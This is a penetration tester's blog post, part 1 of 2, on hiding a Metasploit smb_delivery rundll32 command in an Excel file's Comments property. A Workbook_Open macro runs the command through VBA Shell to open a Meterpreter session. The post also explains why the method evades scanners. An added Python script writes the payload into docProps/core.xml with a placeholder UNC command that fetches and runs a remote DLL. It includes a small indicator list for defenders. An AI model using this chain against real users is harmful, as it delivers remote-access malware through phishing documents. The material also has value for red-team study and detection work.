Executing Metasploit & Empire Payloads from MS Office Document Properties (part 1 of 2)

As a penetration tester I'm always excited to see new and creative methods for creating weaponised MS Office documents. This blog post builds on the following findings published by Black Hills InfoSec: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/

There are numerous ways in which MS Office documents can be abused and weaponised to deliver a variety of attacks. This post demonstrates how quick and easy it is to hide a Metasploit or Empire payload in a document property of an MS Office file and execute it from an embedded macro, so that the command line never appears in the macro code itself.

Metasploit:

In the first example I'm going to use a payload generated with Metasploit's 'SMB Delivery' module (exploit/windows/smb/smb_delivery) to weaponise an MS Excel document. 'SMB Delivery' is a personal favourite of mine given its simplicity and subtle anti-virus evasion: the payload DLL is served from an SMB share under the attacker's control and loaded by rundll32.exe, rather than being dropped to disk by the document itself.

Begin by loading the relevant module, exploit/windows/smb/smb_delivery, into Metasploit.

Set the payload to whatever you need; in this example I'll be using the Windows Meterpreter reverse HTTPS payload (windows/meterpreter/reverse_https), which also requires LHOST, and optionally LPORT, to be set to the listener you want the victim to call back to.

Finally, issue the 'exploit' command to stage the attack: the module starts an SMB server that hosts the payload DLL and, alongside it, the handler that will receive the reverse connection.

Now, in order to make use of this, Metasploit prints the command that must be executed on the victim host: a rundll32.exe one-liner that loads the DLL directly from the module's SMB share over a UNC path.

Note: the share name in that UNC path is randomly generated because we didn't set it explicitly in the module options (the 'SHARE' option); set it yourself if you need a predictable path.

To achieve this, we're going to embed the command in an MS Excel document's 'Comments' property and execute it from an embedded macro. The embedding can easily be done with the PowerShell script 'Commentator' (https://github.com/clr2of8/Commentator).

Begin by starting PowerShell.

Import the Commentator script into your PowerShell environment (dot-source it or use Import-Module on the .ps1).

Then run the script to embed our payload into the 'Comments' property of the MS Excel document.

After it runs successfully, a copy of your existing MS Office file is written with the payload embedded:

The new file with added comment has been written to .\msf_smb_delivery-wlc.xlsx.

DONE!

This can be verified by inspecting the file's metadata / properties (File > Info > Properties in Excel, or the Details tab of the file's properties in Explorer): the full command line is sitting in the Comments field in clear text.

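The same embedding and the same check can be done without Excel or PowerShell at all, because in the zip-based Office formats the "Comments" field is simply the dc:description element of docProps/core.xml. The following Python is an added example (not the post's own steps and not Commentator's code): it rewrites that one part of an .xlsx/.xlsm/.docx while copying every other part through untouched, reads the property back, and runs a small indicator check a defender could point at a mail gateway's quarantine. The command string, the 192.0.2.10 host and the 'abcdefgh' share name are constructed placeholders in the shape smb_delivery prints, not values from the post; minimal_package() is a constructed stand-in containing only the parts the functions touch, so Excel will not open it. Legacy .xls/.doc files (OLE2) keep the Comments field in the SummaryInformation stream instead and are not handled here.

```python
"""Embed a command in an OOXML file's 'Comments' property and read it back.

Stdlib only.  Works on the zip-based formats (.xlsx/.xlsm/.docx/.pptx),
where Office's "Comments" field is dc:description in docProps/core.xml.
Legacy .xls/.doc (OLE2) keep it in the SummaryInformation stream instead
and are NOT handled here.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

CORE_PART = "docProps/core.xml"
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)  # keep Office's prefixes on re-serialisation
DESCRIPTION = "{%s}description" % NS["dc"]  # the "Comments" field


def get_comment(package: bytes):
    """Return the Comments (dc:description) value, or None if absent."""
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        if CORE_PART not in z.namelist():
            return None
        node = ET.fromstring(z.read(CORE_PART)).find(DESCRIPTION)
    return node.text if node is not None else None


def set_comment(package: bytes, comment: str) -> bytes:
    """Return a copy of the package with the Comments property set to `comment`.

    Only docProps/core.xml is rewritten; sheets, formulas and relationships
    are copied through byte-for-byte, so the workbook still opens normally.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(package)) as zin:
        if CORE_PART not in zin.namelist():
            raise ValueError("not an Office package: missing " + CORE_PART)
        root = ET.fromstring(zin.read(CORE_PART))
        node = root.find(DESCRIPTION)
        if node is None:
            node = ET.SubElement(root, DESCRIPTION)
        node.text = comment
        new_core = ET.tostring(root, encoding="utf-8", xml_declaration=True)
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
            for info in zin.infolist():
                data = new_core if info.filename == CORE_PART else zin.read(info)
                zout.writestr(info, data)  # keeps part order, names and timestamps
    return out.getvalue()


def part_names(package: bytes) -> list:
    """Sorted list of parts in the package (to confirm nothing was dropped)."""
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        return sorted(z.namelist())


# What a defender should grep core.xml for: a Comments field that reads like
# a command line.  Constructed, deliberately small list; extend for your estate.
INDICATORS = {
    "rundll32": re.compile(r"\brundll32(\.exe)?\b", re.I),
    "regsvr32": re.compile(r"\bregsvr32(\.exe)?\b", re.I),
    "powershell": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "mshta": re.compile(r"\bmshta(\.exe)?\b", re.I),
    "script_host": re.compile(r"\b[wc]script(\.exe)?\b", re.I),
    "cmd": re.compile(r"\bcmd(\.exe)?\b", re.I),
    "unc_path": re.compile(r"\\\\[\w.\-]+\\[\w$.\-]+"),  # \\host\share
}


def suspicious_indicators(comment) -> list:
    """Names of INDICATORS matching the Comments value; [] when it looks benign."""
    if not comment:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(comment)]


def minimal_package() -> bytes:
    """Constructed stand-in for a workbook: only the parts this example touches.

    Excel will not open it; point the functions above at a real .xlsx instead.
    """
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%(cp)s" xmlns:dc="%(dc)s" '
        'xmlns:dcterms="%(dcterms)s" xmlns:xsi="%(xsi)s">'
        "<dc:creator>analyst</dc:creator>"
        '<dcterms:created xsi:type="dcterms:W3CDTF">2018-01-01T00:00:00Z</dcterms:created>'
        "</cp:coreProperties>"
    ) % NS
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr(CORE_PART, core)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed command in the shape smb_delivery prints; host and share
    # are placeholders, not values from the original post.
    cmd = r"rundll32.exe \\192.0.2.10\abcdefgh\test.dll,0"
    weaponised = set_comment(minimal_package(), cmd)
    print("Comments:", get_comment(weaponised))
    print("indicators:", suspicious_indicators(get_comment(weaponised)))
```

To use it on a real file, read the .xlsx as bytes, pass them to set_comment() and write the returned bytes to a new name; get_comment() on the result is the programmatic equivalent of opening the file's properties dialog. On the defensive side, note that the check needs nothing more than unzipping the document: no macro analysis, no sandbox, just a look at one XML part that most document scanners ignore.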
Lastly, to execute the payload embedded in the 'Comments' property, an embedded macro is used. As in the Black Hills post this builds on, the macro only has to read the workbook's Comments property (via BuiltinDocumentProperties) and hand the resulting string to the VBA Shell function; the command line itself never appears in the macro code, which is what keeps the macro looking innocuous to a casual reviewer or a signature-based scanner.

Note: auto-execution via the 'Workbook_Open()' event needs a container that can hold VBA. The .xlsx that Commentator writes cannot contain macros at all, so the weaponised workbook had to be saved down to Excel 97 - 2003 format (.xls) before the macro was added; a macro-enabled .xlsm would work just as well. Excel carries the document properties, including the Comments field, across the Save As.

After the victim has clicked 'Enable Editing' (leaving Protected View) and then 'Enable Content' (allowing macros to run), Workbook_Open fires and a Meterpreter session should appear in Metasploit.

Kai Stimpson

Proud Parent, Senior Security Consultant, Weightlifter and Gardener.
